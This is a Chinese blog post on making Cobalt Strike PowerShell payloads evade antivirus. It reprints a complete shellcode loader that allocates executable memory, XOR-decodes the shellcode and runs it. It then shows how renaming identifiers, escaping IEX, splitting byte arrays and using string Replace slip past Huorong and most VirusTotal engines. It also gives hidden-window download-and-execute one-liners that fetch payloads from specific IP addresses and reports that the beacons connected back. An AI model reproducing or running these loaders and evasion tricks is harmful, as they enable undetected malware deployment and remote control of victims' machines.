powershell免杀

最近在学习powershell免杀这块，本篇文章也是跟着大佬的思路来做的

0x01 powershell脚本生成

通过cs生成一个powershell脚本（我没勾选x64位）

 1 Set-StrictMode -Version 2
 2 
 3 $DoIt = @'
 4 function func_get_proc_address {
 5     Param ($var_module, $var_procedure)        
 6     $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
 7     $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
 8     return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
 9 }
10 
11 function func_get_delegate_type {
12     Param (
13         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
14         [Parameter(Position = 1)] [Type] $var_return_type = [Void]
15     )
16 
17     $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
18     $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
19     $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
20 
21     return $var_type_builder.CreateType()
22 }
23 
24 [Byte[]]$var_code = [System.Convert]::FromBase64String('此处为shellcode，太长就不复制出来了')
25 for ($x = 0; $x -lt $var_code.Count; $x++) {
26     $var_code[$x] = $var_code[$x] -bxor 35
27 }
28 
29 $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
30 $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
31 [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
32 
33 $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
34 $var_runme.Invoke([IntPtr]::Zero)
35 '@
36 
37 If ([IntPtr]::size -eq 8) {
38     start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
39 }
40 else {
41     IEX $DoIt
42 }

直接运行生成的powershell脚本，会直接被杀软杀掉（如火绒）

0x02 powershell免杀

现在把FromBase64String改成FromBase65String，那就解决掉FromBase64String，直接改成byte数组。

$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('【cs生成的shellcode】')
$s |foreach { $string = $string + $_.ToString()+','}

把变量输出到文件中

$string > D:1.txt

然后替换脚本中的内容

 1 Set-StrictMode -Version 2
 2 
 3 $DoIt = @'
 4 function func_get_proc_address {
 5     Param ($var_module, $var_procedure)        
 6     $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
 7     $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
 8     return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
 9 }
10 
11 function func_get_delegate_type {
12     Param (
13         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
14         [Parameter(Position = 1)] [Type] $var_return_type = [Void]
15     )
16 
17     $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
18     $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
19     $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
20 
21     return $var_type_builder.CreateType()
22 }
23 
24 [Byte[]]$var_code = [Byte[]](这里放刚刚转码后的FromBase65String)
25 
26 for ($x = 0; $x -lt $var_code.Count; $x++) {
27     $var_code[$x] = $var_code[$x] -bxor 35
28 }
29 
30 $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
31 $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
32 [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
33 
34 $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
35 $var_runme.Invoke([IntPtr]::Zero)
36 '@
37 
38 If ([IntPtr]::size -eq 8) {
39     start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
40 }
41 else {
42     IEX $DoIt
43 }

ps：注意括号里不要加引号

然后运行脚本，绕过了火绒，cs成功上线

接下来在VT上查杀看看效果 https://www.virustotal.com

效果还不太行，继续改关键字

大概就是把[Byte[]]$var_code那一行上下的函数名和变量前缀var_ 改成别的还有最后的IEX改了一下

改之后的

c.ps1代码

 1 Set-StrictMode -Version 2
 2 
 3 $DoIt = @'
 4 function func_a {
 5     Param ($a_module, $a_procedure)        
 6     $a_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
 7     $a_gpa = $a_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
 8     return $a_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($a_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($a_module)))), $a_procedure))
 9 }
10 
11 function func_b {
12     Param (
13         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $a_parameters,
14         [Parameter(Position = 1)] [Type] $a_return_type = [Void]
15     )
16 
17     $a_type_bb = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBbAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
18     $a_type_bb.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $a_parameters).SetImplementationFlags('Runtime, Managed')
19     $a_type_bb.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $a_return_type, $a_parameters).SetImplementationFlags('Runtime, Managed')
20 
21     return $a_type_bb.CreateType()
22 }
23 
24 [Byte[]]$a_code = [Byte[]](这里放刚刚转码后的FromBase65String)
25 
26 for ($x = 0; $x -lt $a_code.Count; $x++) {
27     $a_code[$x] = $a_code[$x] -bxor 35
28 }
29 
30 $a_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_a kernel32.dll VirtualAlloc), (func_b @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
31 $a_buffer = $a_va.Invoke([IntPtr]::Zero, $a_code.Length, 0x3000, 0x40)
32 [System.Runtime.InteropServices.Marshal]::Copy($a_code, 0, $a_buffer, $a_code.length)
33 
34 $a_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($a_buffer, (func_b @([IntPtr]) ([Void])))
35 $a_runme.Invoke([IntPtr]::Zero)
36 '@
37 
38 If ([IntPtr]::size -eq 8) {
39     start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
40 }
41 else {
42     ie`x $DoIt
43 }

运行c.ps1脚本，成功过火绒，且cs上线

放在VT上测试一番

还是有俩av没绕过，但是已经能过绝大多数杀软

0x03 生成无落地powershell免杀

思路：就是cs生成txt-shellcode代码，放到服务器web目录，然后目标执行powershell命令请求下载并执行。对于内容就是换一种编码来混淆，同时可以将编码部分分成几个部分然后再拼接，对于关键命令，可以使用Replace替换的方法。对于访问shellcode文件并执行的命令，可以采用混淆分割合并和Replace替换的方法绕过。

1.先生成无落地执行powershell文件

2.访问http://xxx.xx.xxx.xx:9997/a这个连接看看文件内容，并保存下来

直接执行

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://60.238.86.238:9997/a'))"

会被杀软干掉

通过分析可以看到代码实际组成是：

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("shellcode代码"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

3.直接把FromBase64String改成FromBase65String。

$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('【cs生成的shellcode】')
$s |foreach { $string = $string + $_.ToString()+','}
$string > D:2.txt

4.将生成的编码分成两块或者多块再组合

[Byte[]]$var_c1 =  [Byte[]](分段1)
[Byte[]]$var_c2 =  [Byte[]](分段2)
$var_code=$var_c1+$var_c2

$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

通过vt查杀效果不错

5.另存到服务器的其他txt文件中并访问执行

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://52.214.56.238:8001/a.txt'))"

cs成功上线

6.混淆命令关键词并执行

[Byte[]]$var_c1 =  [Byte[]](分段1)
[Byte[]]$var_c2 =  [Byte[]](分段2)
$var_code=$var_c1+$var_c2

$s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)

放到VT上测试，仍然有个av过不去（太菜了，就先这样吧）

cs也成功上线

ps：确实实现免杀了，不过呢实际执行的时候火绒，360，腾讯跟defender还是会拦截，通过混淆执行语句可以绕过试试

7.远程执行powershell命令免杀方法

注意：免杀要不断尝试，一次混淆不行就多混淆几次，加上替换关键字

远程执行脚本时代码混淆，是因为有时候直接执行cs生成的语句杀软会拦截/

原始语句：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://103.232.213.20:8001/e.txt'))"

混淆可以使用Replace替代代码关键词部分字母，加上通过拆分后再组合的方法

例如：

powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://0.0.0.0:4545/text.txt'')'.Replace('123','adString');IEX ($c1+$c2)"

或者：

powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).123'.Replace('123','Downlo');$c2='adString(''httaaa.56.138:8001/d.txt'')'.Replace('aaa','p://62.234');IEX ($c1+$c2)"

测试后发现以上两种方法都不行，但可以参考关键字免杀

powershell.exe "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://52.214.56.238:8001/e.txt''))';$a3="$a1,$a2";IEX(-join $a3)"

或者

powershell.exe -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://62.234.56.138:8001/d.txt'')'.Replace('123','adString');IEX ($c1+$c2)"

成功绕过

还有powershell语言的特性来混淆代码

常规方法：

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"
cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"

管道输入流：

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

利用环境变量：

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"
cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&cmd /c echo %cmd%|powershell -
cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))
cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ((Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value)

从其他进程获取参数：

cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR https://7ell.me/power)&& FOR /L %i IN (1,1,1000) DO echo"

参考：

文章来源

Y4er

根据powershell语言的特性来混淆代码的方法与原理